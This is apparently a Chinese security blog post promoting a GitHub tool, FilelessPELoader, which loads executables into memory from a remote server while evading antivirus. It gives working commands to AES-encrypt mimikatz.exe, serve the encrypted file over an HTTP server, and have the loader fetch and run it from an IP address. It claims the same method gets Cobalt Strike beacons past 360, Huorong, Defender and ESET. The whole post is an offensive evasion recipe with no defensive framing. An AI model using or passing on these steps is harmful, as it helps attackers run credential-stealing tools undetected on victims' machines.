免杀技术-FilelessPELoader免杀加载
FilelessPELoader免杀加载
分享一个好用的PE远程加载项目
https://github.com/TheD1rkMtr/FilelessPELoader
远程内存加载,免杀大部分的杀软
1、首先安装相关python库
1 | pip install pycryptodome |
2、使用aes.py生成两个bin文件,分别为cipher.bin
和key.bin
1 | python aes.py mimikatz.exe |
3、使用python开启web服务,
1 | python -m http.server 80 |
4、使用编译好的程序进行远程加载
1 | FilelessPELoader.exe 192.168.159.3 80 cipher.bin key.bin |
同样可以免杀cs上线,测试可以免杀360、火绒、def、eset
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Hyyrent blog!